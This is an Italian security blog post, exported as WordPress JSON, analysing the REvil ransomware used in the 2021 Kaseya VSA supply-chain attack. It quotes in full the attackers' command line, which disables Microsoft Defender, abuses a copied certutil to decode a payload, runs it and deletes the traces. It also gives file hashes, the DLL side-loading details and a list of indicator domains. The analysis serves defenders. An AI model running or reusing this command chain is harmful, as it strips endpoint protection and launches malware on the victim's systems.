{"id":2733,"date":"2021-07-12T10:12:00","date_gmt":"2021-07-12T08:12:00","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=2733"},"modified":"2021-07-12T10:12:00","modified_gmt":"2021-07-12T08:12:00","slug":"analisi-sample-revil-kaseya","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/cyber-security-news\/analisi-sample-revil-kaseya\/","title":{"rendered":"Analisi sample Revil kaseya"},"content":{"rendered":"\n<p style=\"text-align: justify\">Il 2 luglio Kaseya ha pubblicato un avviso in cui affermava di essere sotto attacco informatico con impatti sulla suite VSA. Tale software consente di eseguire la gestione delle patch e il monitoraggio delle infrastrutture e sistemi informatici.<br>Nei giorni successivi si \u00e8 scoperto essere un attacco Ransomware di tipo <strong><em>Supply-chain<\/em><\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2021\/07\/revil-blog.png\" alt=\"\" loading=\"lazy\" \/><figcaption>Blog criminale con richiesta di riscatto<\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Inizio della compromissione<\/h2>\n\n\n\n<p style=\"text-align: justify\">Il payload malevolo \u00e8 stato inviato ai server VSA e, a sua volta, alle applicazioni Agent VSA in esecuzione sui dispositivi Windows gestiti. Ci\u00f2 ha fornito a Revil e all&#8217;<strong>operator<\/strong> specifico la possibilit\u00e0 di avviare l&#8217;attacco. In questo modo, i criminali hanno:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>avviato la compromissione attraverso un canale attendibile;<\/li><li>sfruttato la fiducia nel codice dell&#8217;agente VSA, riflessa nelle\u200e<a class=\"ek-link ek-link\" href=\"https:\/\/helpdesk.kaseya.com\/hc\/en-gb\/articles\/229014948-Anti-Virus-Exclusions-and-Trusted-Apps\">\u200e esclusioni software anti-malware\u200e\u200e <\/a>necessarie al software Kaseya.<\/li><\/ul>\n\n\n\n<p style=\"text-align: justify\">Tutto ci\u00f2 che viene eseguito dal Kaseya Agent Monitor viene quindi ignorato a causa di tali esclusioni, che hanno permesso ai criminali di distribuire il proprio <em>dropper <\/em>senza controllo.<\/p>\n\n\n\n<p style=\"text-align: justify\">Pe poter causare maggior danni ed essere eseguito in maniera indisturbata, i criminali hanno forzato tramite il software Kaseya la disabilitazione del software AntiVirus e avviato il Ransomwre tramite il comando :<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>C:\\WINDOWS\\system32\\cmd.exe\u201d \/c ping 127.0.0.1 -n 4979 &gt; nul &amp;  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference  -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true  -DisableIOAVProtection $true -DisableScriptScanning $true &#8211; EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode &#8211; Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend &amp; copy \/Y  C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe &amp; echo %RANDOM% &gt;&gt;  C:\\Windows\\cert.exe &amp; C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt  c:\\kworking\\agent.exe &amp; del \/q \/f c:\\kworking\\agent.crt C:\\Windows\\cert.exe  &amp; c:\\kworking\\agent.exe<\/p><\/blockquote>\n\n\n\n<p><strong>ping 127.0.0.1 -n 4979&gt; nul&nbsp;<\/strong> <br>Viene utilizzato come timer, eseguendo un certo numero random (in questo caso 4979) di volte &#8220;echo null&#8221; a localhost.<br><br> <strong>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend<\/strong> <br>Contiene un comando PowerShell per disabilitare la protezione di Microsoft Defender andando a disabilitare le seguenti features:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li> Real-time protection<\/li><li>Network protection against exploitation of known vulnerabilities<\/li><li>Scanning of all downloaded files and attachments<\/li><li>Scanning of scripts<\/li><li>Ransomware protection<\/li><li>Protection that prevents any application from gaining access to dangerous domains that may host phishing scams, exploits, and other malicious content on the Internet<\/li><li>Sharing of potential threat information with Microsoft Active Protection Service (MAPS)<\/li><li>Automatic sample submission to Microsoft <\/li><\/ul>\n\n\n\n<p><strong>copy \/Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe&nbsp;<\/strong> <br>Crea una copia dell&#8217;utility dei servizi certificati e la posiziona in  <strong>C:\\Windows\\cert.exe<\/strong>.<br>\u00c8 possibile utilizzare certutil.exe per eseguire il dump e visualizzare le informazioni di configurazione dell&#8217;autorit\u00e0 di certificazione (CA), configurare i servizi certificati, i componenti CA di backup e ripristino e verificare i certificati, le coppie di chiavi e le catene di certificati. <br><br><strong>echo %RANDOM% &gt;&gt; C:\\Windows\\cert.exe<\/strong> <br>Appende alla fine del file un numero casuale alla fine del file cert.exe per cercare di evadere le soluzioni di sicurezza che controllano che l&#8217;hash di cert.exe<br><br> <strong>C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe<\/strong> <br>La copia di CERTUTIL viene usata per decodificare il payload cifrato in Base64 del file AGENT.CRT e lo scrive nell&#8217;eseguibile AGENT.EXE, nella working directory di Kaseya.<br><br> <strong>del \/q \/f c:\\kworking\\agent.crt C:\\Windows\\cert.exe<\/strong> <br>Il file di payload originale  C:\\KWORKING\\AGENT.CRT&nbsp; e la copia di  CERTUTIL vengono cancellati.<br><br> <strong>c:\\kworking\\agent.exe<\/strong> <br>  In fine, il processo AGENTMON.EXE esegue AGENT.EXE. In tal modo, il nuovo processo eredita i privilegi di sistema di AGENTMON e ha inizio il dropping del  ransomware.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Analisi Statica<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">File iniziale<\/h3>\n\n\n\n<h5 class=\"wp-block-heading\">Tag<\/h5>\n\n\n\n<p> <mark><span style=\"color:#ffffff\" class=\"tadv-color\"><span style=\"background-color:#e91e63\" class=\"tadv-background-color\">Dropper <\/span><\/span><\/mark><\/p>\n\n\n\n<h5 class=\"wp-block-heading\"> Dettagli <\/h5>\n\n\n\n<figure class=\"wp-block-table is-style-stripes\"><table class=\"\"><tbody><tr><td> <strong>original name<\/strong>  <\/td><td> AGENT.EXE <\/td><\/tr><tr><td><strong>md5<\/strong><\/td><td>561CFFBABA71A6E8CC1CDCEDA990EAD4<\/td><\/tr><tr><td><strong>sha1<\/strong><\/td><td>5162F14D75E96EDB914D1756349D6E11583DB0B0<\/td><\/tr><tr><td><strong>sha256<\/strong><\/td><td>D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E<\/td><\/tr><tr><td><strong>file-size<\/strong><\/td><td>912264 (bytes)<\/td><\/tr><tr><td><strong>entropy<\/strong><\/td><td>6.952<\/td><\/tr><tr><td><strong>imphash<\/strong><\/td><td>59349B1648EDDF021C01F05A17A0E870<\/td><\/tr><tr><td><strong>file-type<\/strong><\/td><td>executable<\/td><\/tr><tr><td><strong>cpu<\/strong><\/td><td>32-bit<\/td><\/tr><tr><td><strong>Virustotal<\/strong><\/td><td>score 44\/68<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h5 class=\"wp-block-heading\">Descrizione<\/h5>\n\n\n\n<p>File  firmato da  <strong>PB03 TRANSPORT LTD<\/strong> risultante essere il  <em>malware dropper<\/em> di Revil\/Sodinokibi. Tale <strong>dropper <\/strong>ha lo scopo di creare due file nel percorso hardcoded  &#8220;<strong>C:\\Windows\\&#8221;<\/strong>. I due <em>payload <\/em> sono contenuti all&#8217;interno del dropper stesso, attraverso il riferimento a due risorse.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/07\/image-3.png\" alt=\"\" class=\"wp-image-2764\" loading=\"lazy\" \/><figcaption>Risorse all&#8217;interno del dropper<\/figcaption><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator\" \/>\n\n\n\n<h3 class=\"wp-block-heading\">Primo file droppato<\/h3>\n\n\n\n<h5 class=\"wp-block-heading\">Tag<\/h5>\n\n\n\n<p><span style=\"color:#ffffff\" class=\"tadv-color\"><span style=\"background-color:#0df402\" class=\"tadv-background-color\"> Microsoft Windows Defender <\/span><\/span><\/p>\n\n\n\n<h5 class=\"wp-block-heading\"> Dettagli <\/h5>\n\n\n\n<figure class=\"wp-block-table is-style-stripes\"><table class=\"\"><tbody><tr><td><strong>original name<\/strong> <\/td><td> MsMpEng.exe <\/td><\/tr><tr><td><strong>md5<\/strong><\/td><td>8CC83221870DD07144E63DF594C391D9<\/td><\/tr><tr><td><strong>sha1<\/strong><\/td><td>3D409B39B8502FCD23335A878F2CBDAF6D721995<\/td><\/tr><tr><td><strong>sha256<\/strong><\/td><td>33BC14D231A4AFAA18F06513766D5F69D8B88F1E697CD127D24FB4B72AD44C7A<\/td><\/tr><tr><td><strong>file-size<\/strong><\/td><td>22224 (bytes)<\/td><\/tr><tr><td><strong>entropy<\/strong><\/td><td>6.803<\/td><\/tr><tr><td><strong>description<\/strong><\/td><td>Antimalware Service Executable<\/td><\/tr><tr><td><strong>file-type<\/strong><\/td><td>executable<\/td><\/tr><tr><td><strong>cpu<\/strong><\/td><td>32-bit<\/td><\/tr><tr><td><strong>Virustotal<\/strong><\/td><td>score 0\/68<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h5 class=\"wp-block-heading\">Descrizione<\/h5>\n\n\n\n<p>Il file risulta essere una copia legittima di <strong>Microsoft Windows Defender<\/strong>&nbsp;(<strong>MsMpEng.exe<\/strong>). <br>Dopo aver eseguito il side-load della dll malevola, questa copia di Defender viene sfruttata per eseguire la fase di crittografia dei file attraverso un processo legittimo.<\/p>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/07\/image-4.png\" alt=\"\" class=\"wp-image-2765\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/07\/image-5.png\" alt=\"\" class=\"wp-image-2767\" loading=\"lazy\" \/><\/figure>\n<\/div>\n<\/div>\n\n\n\n<hr class=\"wp-block-separator\" \/>\n\n\n\n<h3 class=\"wp-block-heading\"> Secondo file droppato <\/h3>\n\n\n\n<h5 class=\"wp-block-heading\">Tag<\/h5>\n\n\n\n<p><span style=\"background-color:#ff0021\" class=\"tadv-background-color\"><span style=\"color:#ffffff\" class=\"tadv-color\">Revil<\/span><\/span><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Dettagli<\/h4>\n\n\n\n<figure class=\"wp-block-table is-style-stripes\"><table class=\"\"><tbody><tr><td><strong>original name <\/strong> <\/td><td>MpSvc.dll <\/td><\/tr><tr><td><strong>md5<\/strong><\/td><td>A47CF00AEDF769D60D58BFE00C0B5421<\/td><\/tr><tr><td><strong>sha1<\/strong><\/td><td>656C4D285EA518D90C1B669B79AF475DB31E30B1<\/td><\/tr><tr><td><strong>sha256<\/strong><\/td><td>8DD620D9AEB35960BB766458C8890EDE987C33D239CF730F93FE49D90AE759DD<\/td><\/tr><tr><td><strong>entropy<\/strong><\/td><td>6.979<\/td><\/tr><tr><td><strong>imphash<\/strong><\/td><td>C699899ABB1119ED2B5C97D5D1D4542E<\/td><\/tr><tr><td><strong>file-type<\/strong><\/td><td>dynamic-link-library<\/td><\/tr><tr><td><strong>cpu<\/strong><\/td><td>32-bit<\/td><\/tr><tr><td><strong>file-size<\/strong><\/td><td>808328\n  (bytes)<\/td><\/tr><tr><td><strong>Virustotal<\/strong><\/td><td>score\n  48\/68<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">Dettagli<\/h4>\n\n\n\n<p>Dll malevola contenete il <em>payload <\/em>di Revil e che viene caricata nel legittimo eseguibile di Windows Defender per eseguire le operazioni di crittografia.<br>La dll esporta tre funzioni: <strong>ServiceCrtMain<\/strong>,&nbsp; <strong>ServiceMain<\/strong>, &nbsp;<strong>SvchostPushServiceGlobals<\/strong>.<br>Tramite  <strong>ServiceCrtMain<\/strong> avviene il recupero e l&#8217;esecuzione delle istruzioni dannose.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/07\/image-6.png\" alt=\"\" class=\"wp-image-2773\" loading=\"lazy\" \/><figcaption>Export della dll malevola<\/figcaption><\/figure><\/div>\n\n\n\n<h2 class=\"wp-block-heading\"> Indicatori di Compromissione (IOC)&nbsp; <\/h2>\n\n\n\n<figure class=\"wp-block-table is-style-stripes\"><table class=\"has-fixed-layout\"><tbody><tr><td><strong>Indicator_type<\/strong><\/td><td><strong>Data<\/strong><\/td><td><strong>Note<\/strong><\/td><\/tr><tr><td>file_path_name<\/td><td>C:\\windows\\cert.exe<\/td><td>Copied\n  CERTUTIL<\/td><\/tr><tr><td>file_path_name<\/td><td>C:\\windows\\msmpeng.exe<\/td><td>Outdated\n  Defender executable vulnerable to DLL sideload<\/td><\/tr><tr><td>sha256<\/td><td>33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a<\/td><td>Outdated\n  Defender executable vulnerable to DLL sideload<\/td><\/tr><tr><td>file_path_name<\/td><td>C:\\kworking\\agent.crt<\/td><td>Revil\n  dropper used in Kaseya exploit<\/td><\/tr><tr><td>sha256<\/td><td>d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1<\/td><td>Revil\n  dropper used in Kaseya exploit<\/td><\/tr><tr><td>file_path_name<\/td><td>C:\\windows\\mpsvc.dll<\/td><td>Revil\n  ransomware DLL<\/td><\/tr><tr><td>sha256<\/td><td>8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd<\/td><td>Revil\n  ransomware DLL<\/td><\/tr><tr><td>domain<\/td><td>ncuccr.org<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>1team.es<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>4net.guru<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>35-40konkatsu.net<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>123vrachi.ru<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>4youbeautysalon.com<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>12starhd.online<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>101gowrie.com<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>8449nohate.org<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>1kbk.com.ua<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>365questions.org<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>321play.com.hk<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>candyhouseusa.com<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>andersongilmour.co.uk<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>facettenreich27.de<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>blgr.be<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>fannmedias.com<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>southeasternacademyofprosthodontics.org<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>filmstreamingvfcomplet.be<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>smartypractice.com<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>tanzschule-kieber.de<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>iqbalscientific.com<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>pasvenska.se<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>cursosgratuitosnainternet.com<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>bierensgebakkramen.nl<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>c2e-poitiers.com<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>gonzalezfornes.es<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>tonelektro.nl<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>milestoneshows.com<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>blossombeyond50.com<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>thomasvicino.com<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>kaotikkustomz.com<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>mindpackstudios.com<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>faroairporttransfers.net<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>daklesa.de<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>bxdf.info<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>simoneblum.de<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>gmto.fr<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>cerebralforce.net<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>myhostcloud.com<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>fotoscondron.com<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>sw1m.ru<\/td><td>&nbsp;<\/td><\/tr><tr><td>domain<\/td><td>homng.net<\/td><td>&nbsp;<\/td><\/tr><\/tbody><\/table><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Inizio della compromissione avviato la compromissione attraverso un canale attendibile; sfruttato la fiducia nel codice dell&#8217;agente VSA, riflessa nelle\u200e\u200e esclusioni software anti-malware\u200e\u200e necessarie al software Kaseya. C:\\WINDOWS\\system32\\cmd.exe\u201d \/c ping 127.0.0.1 -n 4979 &gt; nul &amp; C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true &#8211; EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode &#8211; Force -MAPSReporting Disabled -SubmitSamplesConsent [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1618,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[28,73,196,212,283],"class_list":["post-2733","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cyber-security-news","tag-analysis","tag-code","tag-kaseya","tag-malware","tag-ransomware"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/2733","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=2733"}],"version-history":[{"count":1,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/2733\/revisions"}],"predecessor-version":[{"id":4249,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/2733\/revisions\/4249"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=2733"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=2733"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=2733"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}